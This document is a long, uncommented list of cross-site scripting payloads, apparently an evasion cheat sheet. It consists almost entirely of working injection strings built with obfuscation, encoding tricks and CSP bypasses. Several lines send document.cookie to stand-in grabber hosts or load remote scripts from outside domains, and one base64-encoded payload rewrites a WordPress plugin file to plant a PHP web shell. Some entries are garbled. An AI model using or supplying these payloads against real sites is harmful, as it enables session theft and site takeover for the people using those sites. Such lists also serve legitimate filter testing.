- “/><script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
- <script> document.write(‘<math><! — ‘); </script> <i name=” →<head><script>//”>alert(1)<! — </script> →
- <script>document.write(‘<math><! — ‘);</script><i name=” →<head><script>//”>alert(1)<! — </script> →
- <SCRIPT>document.write(“<SCRI”)
- <script>document.write(‘<script>/*’);</script>*/alert(1)</script>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js"></SCRIPT>
- <;SCRIPT>;document.write(“;<;SCRI”;);<;/SCRIPT>;PT SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <script>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://www.securitycompass.com/xss.js"></script>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”httx://xss.rocks/xss.js”></SCRIPT>
- <script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
- <script>document.write(String.fromCharCode(b??WAN?));</script>
- <script>document.write(String.fromCharCode(xss));</script>
- <script>document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);</script>
- <script>document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);</script>
- <SCRIPT>document.write(“XSS”);</SCRIPT>
- <SCRIPT>document.write(“XSS”);</SCRIPT>
- <script>’e1v2a3l’.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })</script>
- <script>eval(“\141\154\145\162\164`1`”)</script>
- <script>eval(“\141\154\145\162\164`1`”)</script> // Octal escapes combined ES6 Diacritical Grave
- <script>eval(“\61\6c\65……”);<script>
- <script>eval.call`${‘prompt\x281)’}`</script>
- <script>eval(location.hash)</script> (Firefox)
- <script>eval(location.hash.slice(1))</script>
- <script>eval(location.hash.slice(1))</script>#alert(1)
- <script>eval(location.hash.slice(1))</script>#alert(a)
- <script>eval_r(z)</script>
- <script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script>
- <script>eval(‘\\u’+’0061'+’lert(1)’)</script>
- <script>eval(“\x61\x6c\x65\x72\x74(1)”);</script>
- <script>eval(“\x61\x6c\x65\x72\x74(1)”);</script> // Hexadecimal escapes using eval
- <script>eval(z)</script>
- <script>f=document.createElement(“iframe”);f.id=”pwn”;f.src=”/robots.txt”;f.onload=()=>{x=document.createElement(‘script’);x.src=’//bo0om.ru/csp.js’;pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);</script>
- <script firefox>alert(1)</script>
- <script>foo</script>
- <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
- <script for=document event=onreadystatechange>getElementById(‘safe123’).click()</script>
- <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
- <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
- <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
- <script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=>
- <script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>
- <script>for((i)in(self))eval(i)(1)</script>
- <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
- <script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
- <script> (function (o) { function exploit(x) { if (x !== null) confirm(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
- <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
- <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>
- <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>history.pushState(0,0,’/i/am/somewhere_else’);</script>
- ‘“</Script><Html /Onmouseover=(alert)(1) //
- <script?=”>”?=”http://yoursite.com/xss.js?69,69"></script>
- <SCRIPT id=XSS SRC=http://127.0.0.1></SCRIPT>
- <SCRIPT id=XSS SRC=”http://xxxx.com/xss.jpg"></SCRIPT>
- <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?<B>
- <SCRIPT id=XSS SRC=http://xxxx.com/xss.js></SCRIPT>
- <script>if(top!=self)top.location=location</script>
- <script>if(“x\*chr*”.length==1) { log(*num*);}</script>
- <script>if(“x\\xE0\xB9\x92”.length==2) { javascript:alert(1);}</script>
- <script>if(“x\\xE1\x96\x89”.length==2) { javascript:alert(1);}</script>
- <script>if(“x\\xEE\xA9\x93”.length==2) { javascript:alert(1);}</script>
- </script><img/*%00/src=”worksinchrome:prompt(1)”/%00*/onerror=’eval(src)’>
- </script><img/*%00/src=”worksinchrome:prompt(1)”/%00*/onerror=’eval(src)’>
- <script/img>alert(199)</script/>
- </script><img/*/src=”worksinchrome:prompt(1)”/*/onerror=’eval(src)’>
- <script+&injection=>alert(1)></script>
- <script itworksinallbrowsers>/*<script* */alert(1)</script ?
- <script itworksinallbrowsers>/*<script* */alert(1)</script
- <script itworksinallbrowsers>/*<script* */alert(1)</script
- <script itworksinallbrowsers>/*<script* */confirm(1)</script ?
- <script itworksinallbrowsers>/*<script* */confirm(1)</script
- <script>javascript:alert(1)</script>
- “`’><script>-javascript:alert(1)</script>
- <script>javascript:alert(1)</script\x0A
- <script>javascript:alert(1)</script\x0B
- <script>javascript:alert(1)</script\x0D
- <script>javascript:alert(1)<\x00/script>
- <script>//jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
- <script>/*jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
- ‘“”><script language=”JavaScript”> alert(‘X \nS \nS’);</script>
- ‘“”><script language=”JavaScript”> alert(‘X nS nS’);</script>
- <script language=”JavaScript”>alert(‘XSS’)</script>
- <script language=’javascript’ src=’%(jscript)s’></script>
- <SCRIPT LANGUAGE=”VBScript”>%0a%0dFunction window_onload%0a%0dAlert 1%0a%0dEnd Function </SCRIPT>
- <script language=vbs></script><img src=xx:x onerror=”::alert’ @insertScript ‘::”>
- scriptlet.html”></LAYER>
- <scriptlet> <implements type=”behavior”/><script>alert(1)</script></scriptlet>
- <script>let{location={href:’http://evil.com/ ‘}}=0;alert(location.href);</script>
- <script> location.href = ‘data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=’; </script>
- <script>location.href=decodeURIComponent(location.hash.slice(1));</script>
- <script>location.href=’http://127.0.0.1:8088/cookie.php?cookie='+escape(document.cookie);</script>
- <script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
- <script>location.href;’javascript:alert(1)’</script>
- <script>location.href;’javascript:alert%281%29'</script>
- “`’><script>lo*chr*g(*num*)</script>
- <script>logChr(0)</script>
- <script> logChr0x09(1); </script>
- “‘`><script>log*chr*(*num*)</script>
- ‘/<\/?(script|meta|link|frame|iframe).*>/Uis’,
- <script>new class extends alert(1){}</script>
- <script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
- <script>new function(){new.target.constructor(‘alert(1)’)();}</script>
- <script>new Image()[unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)</script>
- <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
- <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>
- <script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});alert(Safe.get())</script>
- <script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});confirm(Safe.get())</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)()</script>
- <script/onload=confirm(1)></script>
- <script onLoad script onLoad=”javascript:javascript:alert(1)”></script onLoad>
- <script/onreadystatechange=alert(1)>
- <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
- <script onReadyStateChange script onReadyStateChange=”javascript:javascript:alert(1)”></script onReadyStateChange>
- <script>parent[‘alert’](1)</script>
- <script>%(payload)s</script>
- <<SCRIPT>%(payload)s//<</SCRIPT>
- <script>Promise.reject(“1”).then(null,alert)</script>
- <script>prompt(1234)</script>
- <*script>prompt(123)<*/script>
- ‘ →”>’>’”<script>prompt(198)</script>;” f0r=TRUE
- < s c r i p t > p r o m p t ( 1 ) < / s c r i p t >
- <script>prompt(1)</script>
- <script>prompt(1);</script>
- “><script>`#${prompt(1)}#`</script>
- \”><script>prompt(1)</script>
- <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script>
- <script>prompt(88199)</script>
- <script>prompt.call`${1}`</script>
- <script>prompt(-[])</script>
- scriptprop={{_factory}}
- <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script>
- <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x</script>
- <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x</script>
- <script>Reflect.construct(function(){new.target.constructor(‘alert(1)’)()},[])</script>
- <script/renwa~~~>;alert(1);</script/X~~~>
- <script>(()=>{return this})().alert(1)</script>
- <script>RuntimeObject(“w*”)[“window”][“alert”](1);</script>
- <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
- <script>$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();</script>
- </script><script>’%0A’-alert(1)//
- </script><script>alert(0x000123)</script>
- \”></script><script>alert(0x000123)</script>
- \”></sCriPt><sCriPt >alert(0x000123)</sCriPt>
- < / script >< script >alert(123)< / script >
- </script><script>alert(123)</script>
- <;/script>;<;script>;alert(1)<;/script>;
- </script><script>alert(1)</script>
- </script><script>alert(1)</script>
- </script><script >alert(document.cookie)</script>
- // →</SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
- ‘</script><script>alert(String.fromCharCode(88,83,83))</script>/
- ‘;</script>”>’><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>
- ></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- // →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- “></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- </script><script>alert(XSS by Shawar)</script>
- </script><script>alert(��Xss��)</script>
- </script><script>alert(Xss)</script>
- </script><script>alert(‘XSS’);</script>
- </script><script>confirm(3)</script>
- </SCRIPT>”>’><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>
- </script><script>prompt(“test”)</script>
- ;<><script></script>/<script>alert(‘0’)</script>
- <</script/script><script>eval(‘\\u’+’0061'+’lert(1)’)//</script>
- </script></script><<<<script><>>>><<<script>alert(123)</script>
- </script></script><<<<script><>>>><<<script>alert(123)</script>
- </script></script><<<<script><>>>><<<script>alert(XSS)</script>
- <</script/script><script ~~~>\u0061lert(1)</script ~~~>
- </script><script>/*var a=”/*””’/**/;confirm(1);//</script>
- <script>self[‘alert’](2)</script>
- <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
- <script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>
- <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
- <script>setTimeout(‘alert(1)’,0)</script>
- <script>setTimeout(“a” + “lert” + “(1)”);</script>
- <script>setTimeout(“a” + “lert” + “(1)”);</script> // Using Basic Concatenation
- <script>setTimeout(alert(88199),0)</script>
- <script>setTimeout(/a/.source + /lert/.source + “(1)”);</script>
- <script>setTimeout(/a/.source + /lert/.source + “(1)”);</script> // Using source property for concatenation
- <script>setTimeout(location)</script>, use: <a href=”//target#
alert(1)”>CLICK</a>
- <script> … setTimeout(\”writetitle()\”,$_GET[xss]) … </script>
- (/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
- <script/src=//?.?>
- script/src=//??
- <script src=data:text/javascript,alert(88199)></script>
- <script/src=data:text/javascript,alert(1)></script> ?
- <script/src=data:text/javascript,alert(1)></script>
- <script/src=data:text/javascript,alert(1)></script>
- <script/src=data:text/javascript,alert(1)></script>
- <script src=1 href=1 onerror=”javascript:alert(1)”></script>
- <script src=’1.js’></script>
- <script src=//3334957647/1>
- <script src=”//aEa?L”></script>)
- <script src=”#”>{alert(1)}</script>;1
- <script src=//brutelogic.com.br/1>
- <script src=//brutelogic.com.br/1.js>
- <script src=//brutelogic.com.br/1.js>
- <script src=”//brutelogic.com.br/1.js#
- “><script src=//brutelogic.com.br/1.js#
- <SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
- <script src=”//brutelogic.com.br/1.js#
- <script src=”//brutelogic.com.br/1.js#
- “><script src=//brutelogic.com.br/1.js#
- “><script src=//brutelogic.com.br/1.js#
- <script src=/bypass/usercontent/xss.js></script>
- <script src=>confirm(8)</script>
- <script src=”data:%26comma;alert(1)//
- <script src=data:%26comma;alert(1)//
- “><script src=data:%26comma;alert(1)-”
- “><script src=data:%26comma;alert(1)//
- <script src=”data:%26comma;alert(1)%26sol;%26sol;
- <script src=data:%26comma;alert(1)%26sol;%26sol;
- <SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT>
- <SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT> //Cross Browser (PEPE Vila)
- <script/src=data:,alert()>
- <script src=”data:,alert(1)//
- <script src=data:,alert(1)>
- “><script src=data:,alert(1)//
- <script src=”data:,alert(1)%250A →
- <script src=data:,alert(1)></script>
- <script src=”data:,alert(64)%250A →
- <script src=data:,alert(document.cookie)></script>
- <script src=”data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==”></script>
- <script/src=”data:text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
- <script/src=”data:text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
- “/><script/src=”data:text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script>
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
- <script src=”data:,alert(1)//
- “><script src=data:,alert(1)//
- <script/src=”data:,eval(atob(location.hash.slice(1)))//#alert(1)
- <script+src=data:,confirm(1)<! —
- “/><script+src=data:,confirm(1)<! —
- <script/src=”data:,eval(atob(location.hash.slice(1)))//#
- <script/src=”data:,eval(atob(location.hash.slice(1)))//##eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3BsdWdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5waHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0nX3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRVRbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpDQp4LnNlbmQoJCk=
- <script/src=data:&p=alert(50)></script>
- <script src=data:text/html,alert(1)></script>
- <script src=data:text/html;,alert(1)></script>
- <script src=data:text/html,alert(document.cookie)></script>
- <script src=data:text/html;,alert(document.cookie)></script>
- <script src=”data:text/html;base64,YWxlcnQoMSk=”></script>
- <script src=data:text/html;base64,YWxlcnQoMSk=></script>
- <script src=”data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==”></script>
- <script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
- <script src=”data:text/javascript,alert(1)”></script>
- <script src=data:text/javascript,alert(88199)></script>
